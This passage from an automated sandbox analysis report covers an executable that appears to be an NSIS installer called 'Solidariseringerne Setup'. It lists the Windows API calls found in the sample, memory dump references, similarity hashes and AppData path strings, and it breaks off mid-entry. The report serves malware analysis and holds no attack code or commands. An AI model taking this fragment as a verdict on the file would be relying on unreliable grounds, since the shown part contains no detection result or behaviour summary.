                                                                              • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000020,?,0040313E,00000000,0040A8C0,00000020,0040A8C0,00000020,000000FF,00000004,00000000), ref: 00405B83
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: FileWrite
                                                                              • String ID:
                                                                              • API String ID: 3934441357-0
                                                                              • Opcode ID: c136fe23a15198738cdde8d9ae5bd390bad499becbb6fab094427491a2b8e812
                                                                              • Instruction ID: af6d97e9b78343fe008ce3e7999d984a763d513ea29e4df05d500f045cbeb3ca
                                                                              • Opcode Fuzzy Hash: c136fe23a15198738cdde8d9ae5bd390bad499becbb6fab094427491a2b8e812
                                                                              • Instruction Fuzzy Hash: B2E0EC3262425AABDF509E559C00AEB7BACEB05360F008436FD15E2151D635F8219FA5
                                                                              APIs
                                                                              • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00405E43,?,?,?,?,00000002,: Completed), ref: 00405DD9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: Open
                                                                              • String ID:
                                                                              • API String ID: 71445658-0
                                                                              • Opcode ID: 688c0e3dac6200a4dcf5f70578aed2939ff3afbafb421f65443b8838c7a2b092
                                                                              • Instruction ID: 1bb1e450acb1cec7aaebab1a7e88d6b79e3e17733f6ed9cfc6e3f6d6de5b0954
                                                                              • Opcode Fuzzy Hash: 688c0e3dac6200a4dcf5f70578aed2939ff3afbafb421f65443b8838c7a2b092
                                                                              • Instruction Fuzzy Hash: D9D0123214024EBBDF115F909C05FAB3B2DEF04314F108827FE06A4090D375D530AB65
                                                                              APIs
                                                                              • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: AttributesFile
                                                                              • String ID:
                                                                              • API String ID: 3188754299-0
                                                                              • Opcode ID: 9ad3368f28842b63240b43095d0b068e3f646c1f23794f7f91dbfbeff94efc4c
                                                                              • Instruction ID: e41715f0e6a8bf2c44c365c92f64d23a332030a9f95fc047605520203e95b8fc
                                                                              • Opcode Fuzzy Hash: 9ad3368f28842b63240b43095d0b068e3f646c1f23794f7f91dbfbeff94efc4c
                                                                              • Instruction Fuzzy Hash: 9BD012B6708111ABCB10DFA8AA4869D77A49B40325B308137D515F21D0E2B9C9456719
                                                                              APIs
                                                                              • SendMessageA.USER32(000103FE,00000000,00000000,00000000), ref: 0040404E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID:
                                                                              • API String ID: 3850602802-0
                                                                              • Opcode ID: 875450fc840247aea6e73403ee44149e02d5474b467ece0a28835bfda1230da9
                                                                              • Instruction ID: a420b78244073386fdaf02eaad45271dfd1dc05eac8f2b2552ccdd106ab2ed6e
                                                                              • Opcode Fuzzy Hash: 875450fc840247aea6e73403ee44149e02d5474b467ece0a28835bfda1230da9
                                                                              • Instruction Fuzzy Hash: 70C09B717443007BFA31DB509D49F077758A750B00F5584357320F50D0C6B4E451D62D
                                                                              APIs
                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F0F,?), ref: 00403181
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: FilePointer
                                                                              • String ID:
                                                                              • API String ID: 973152223-0
                                                                              • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                              • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                                                              • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                              • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                                                              APIs
                                                                              • ShellExecuteExA.SHELL32(?,00404415,?), ref: 00405620
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: ExecuteShell
                                                                              • String ID:
                                                                              • API String ID: 587946157-0
                                                                              • Opcode ID: 2982c174e10af5d4c40be735a028cd5bbc0670b812c5b1d1bedef84de471004d
                                                                              • Instruction ID: 740202cceb9cd72bfbe3504c5fe3e084c22a481b72cb9b9ac8673d70f1f22f9b
                                                                              • Opcode Fuzzy Hash: 2982c174e10af5d4c40be735a028cd5bbc0670b812c5b1d1bedef84de471004d
                                                                              • Instruction Fuzzy Hash: 45C092B2404200DFE301CF90CB58F077BE8AB55306F028054E1849A2A0C378A800CB7A
                                                                              APIs
                                                                              • SendMessageA.USER32(00000028,?,00000001,00403E55), ref: 00404033
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID:
                                                                              • API String ID: 3850602802-0
                                                                              • Opcode ID: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
                                                                              • Instruction ID: 7b5ccc39adf6f72de5191684d4495c6b43ffe58f78915606d69c4a7e6f44d702
                                                                              • Opcode Fuzzy Hash: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
                                                                              • Instruction Fuzzy Hash: F3B092B5684200BAEE224B40DD09F457EA2E7A4702F008024B300240B0C6B200A1DB19
                                                                              APIs
                                                                              • KiUserCallbackDispatcher.NTDLL(?,00403DEE), ref: 0040401C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: CallbackDispatcherUser
                                                                              • String ID:
                                                                              • API String ID: 2492992576-0
                                                                              • Opcode ID: 12c11760972377b051275edfb0549e2da63da5a0a3d5c66f9a0e944dd115ee42
                                                                              • Instruction ID: 627edf876ec6fe827e8ded8b6e0f84c3e1bff33d3b07c91bc4a796ca35ff40dd
                                                                              • Opcode Fuzzy Hash: 12c11760972377b051275edfb0549e2da63da5a0a3d5c66f9a0e944dd115ee42
                                                                              • Instruction Fuzzy Hash: CAA00176808101ABCB029B50FF09D9ABF62ABA5705B028435E65694174C7325865FF1A
                                                                              APIs
                                                                                • Part of subcall function 00405056: lstrlenA.KERNEL32(Completed,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030B1,00000000,?), ref: 0040508F
                                                                                • Part of subcall function 00405056: lstrlenA.KERNEL32(004030B1,Completed,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030B1,00000000), ref: 0040509F
                                                                                • Part of subcall function 00405056: lstrcatA.KERNEL32(Completed,004030B1,004030B1,Completed,00000000,0040E8C0,00000000), ref: 004050B2
                                                                                • Part of subcall function 00405056: SetWindowTextA.USER32(Completed,Completed), ref: 004050C4
                                                                                • Part of subcall function 00405056: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004050EA
                                                                                • Part of subcall function 00405056: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405104
                                                                                • Part of subcall function 00405056: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405112
                                                                                • Part of subcall function 004055CE: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421510,Error launching installer), ref: 004055F7
                                                                                • Part of subcall function 004055CE: CloseHandle.KERNEL32(?), ref: 00405604
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F20
                                                                                • Part of subcall function 0040633C: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040634D
                                                                                • Part of subcall function 0040633C: GetExitCodeProcess.KERNEL32(?,?), ref: 0040636F
                                                                                • Part of subcall function 00405E8D: wsprintfA.USER32 ref: 00405E9A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                              • String ID:
                                                                              • API String ID: 2972824698-0
                                                                              • Opcode ID: b0a501a9eafe77c97c2c496f47c0dc6ba7aad14b3677605ff562daff4fba8fe6
                                                                              • Instruction ID: 17f7953f0d5b7b21d2e535c202f5bbb1bf051249d0315c8d96c64ca666d5043c
                                                                              • Opcode Fuzzy Hash: b0a501a9eafe77c97c2c496f47c0dc6ba7aad14b3677605ff562daff4fba8fe6
                                                                              • Instruction Fuzzy Hash: FCF0BB71A05121ABCB20BF654D495EF66A4DF81314B10057BFA01B21D1C77C4E4146BE
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,000003F9), ref: 004049EB
                                                                              • GetDlgItem.USER32(?,00000408), ref: 004049F6
                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A40
                                                                              • LoadBitmapA.USER32(0000006E), ref: 00404A53
                                                                              • SetWindowLongA.USER32(?,000000FC,00404FCA), ref: 00404A6C
                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A80
                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404A92
                                                                              • SendMessageA.USER32(?,00001109,00000002), ref: 00404AA8
                                                                              • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404AB4
                                                                              • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404AC6
                                                                              • DeleteObject.GDI32(00000000), ref: 00404AC9
                                                                              • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404AF4
                                                                              • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404B00
                                                                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B95
                                                                              • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404BC0
                                                                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404BD4
                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 00404C03
                                                                              • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404C11
                                                                              • ShowWindow.USER32(?,00000005), ref: 00404C22
                                                                              • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404D1F
                                                                              • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404D84
                                                                              • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404D99
                                                                              • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404DBD
                                                                              • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404DDD
                                                                              • ImageList_Destroy.COMCTL32(00000000), ref: 00404DF2
                                                                              • GlobalFree.KERNEL32(00000000), ref: 00404E02
                                                                              • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404E7B
                                                                              • SendMessageA.USER32(?,00001102,?,?), ref: 00404F24
                                                                              • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404F33
                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F53
                                                                              • ShowWindow.USER32(?,00000000), ref: 00404FA1
                                                                              • GetDlgItem.USER32(?,000003FE), ref: 00404FAC
                                                                              • ShowWindow.USER32(00000000), ref: 00404FB3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                              • String ID: $M$N
                                                                              • API String ID: 1638840714-813528018
                                                                              • Opcode ID: 5d7cd4127e08cc7e18dc449df1c62f71d17ea125050121c4d20db61d323595a9
                                                                              • Instruction ID: 4638a2be7f0938753f9a717370e01017d92af631219061991dd3498ab54a35db
                                                                              • Opcode Fuzzy Hash: 5d7cd4127e08cc7e18dc449df1c62f71d17ea125050121c4d20db61d323595a9
                                                                              • Instruction Fuzzy Hash: 60027EB0900209AFEF109F54DC85AAE7BB5FB84315F10817AF615BA2E1C7789E42DF58
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,000003FB), ref: 004044AF
                                                                              • SetWindowTextA.USER32(00000000,?), ref: 004044D9
                                                                              • SHBrowseForFolderA.SHELL32(?,0041F0E0,?), ref: 0040458A
                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404595
                                                                              • lstrcmpiA.KERNEL32(: Completed,Solidariseringerne Setup: Completed), ref: 004045C7
                                                                              • lstrcatA.KERNEL32(?,: Completed), ref: 004045D3
                                                                              • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004045E5
                                                                                • Part of subcall function 0040562F: GetDlgItemTextA.USER32(?,?,00000400,0040461C), ref: 00405642
                                                                                • Part of subcall function 00406199: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\AwMu7gR48D.exe",76F93410,C:\Users\user\AppData\Local\Temp\,00000000,00403196,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033CF,?,00000006,00000008,0000000A), ref: 004061F1
                                                                                • Part of subcall function 00406199: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004061FE
                                                                                • Part of subcall function 00406199: CharNextA.USER32(?,"C:\Users\user\Desktop\AwMu7gR48D.exe",76F93410,C:\Users\user\AppData\Local\Temp\,00000000,00403196,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033CF,?,00000006,00000008,0000000A), ref: 00406203
                                                                                • Part of subcall function 00406199: CharPrevA.USER32(?,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000,00403196,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033CF,?,00000006,00000008,0000000A), ref: 00406213
                                                                              • GetDiskFreeSpaceA.KERNEL32(0041ECD8,?,?,0000040F,?,0041ECD8,0041ECD8,?,00000001,0041ECD8,?,?,000003FB,?), ref: 004046A3
                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004046BE
                                                                                • Part of subcall function 00404817: lstrlenA.KERNEL32(Solidariseringerne Setup: Completed,Solidariseringerne Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404732,000000DF,00000000,00000400,?), ref: 004048B5
                                                                                • Part of subcall function 00404817: wsprintfA.USER32 ref: 004048BD
                                                                                • Part of subcall function 00404817: SetDlgItemTextA.USER32(?,Solidariseringerne Setup: Completed), ref: 004048D0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                              • String ID: : Completed$A$C:\Users\user\AppData\Local\unshabbily$Solidariseringerne Setup: Completed
                                                                              • API String ID: 2624150263-741290309
                                                                              • Opcode ID: ef32ee5c924519dd82d117a465dafaf8dcd4de5cfa9c843c3c8ed1b6bd1752c3
                                                                              • Instruction ID: 5dd75e317128adb7bedb8be6abecdb1ea93c725c3d3faa56fa834c848e6f6950
                                                                              • Opcode Fuzzy Hash: ef32ee5c924519dd82d117a465dafaf8dcd4de5cfa9c843c3c8ed1b6bd1752c3
                                                                              • Instruction Fuzzy Hash: 4BA19FF1900209ABDB11AFA5CC45BAFB7B8EF85314F10843BF611B62D1DB7C99418B69
                                                                              APIs
                                                                              • CoCreateInstance.OLE32(00407408,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040214D
                                                                              • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021FC
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\unshabbily\Hardwire, xrefs: 0040218D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharCreateInstanceMultiWide
                                                                              • String ID: C:\Users\user\AppData\Local\unshabbily\Hardwire
                                                                              • API String ID: 123533781-3099227325
                                                                              • Opcode ID: e3b45c08e4ce457a64ba278d5508bdaa5c8a437ab77814b71e65f4811fac46df
                                                                              • Instruction ID: 27b6dc01e21a21dcf175964b2ce54e528eb66c3f275abda499c4f6713b6e0615
                                                                              • Opcode Fuzzy Hash: e3b45c08e4ce457a64ba278d5508bdaa5c8a437ab77814b71e65f4811fac46df
                                                                              • Instruction Fuzzy Hash: 355136B5A00208BFCF10DFE4C988A9DBBB5EF48314F2045AAF915EB2D1DA799941CF54
                                                                              APIs
                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402707
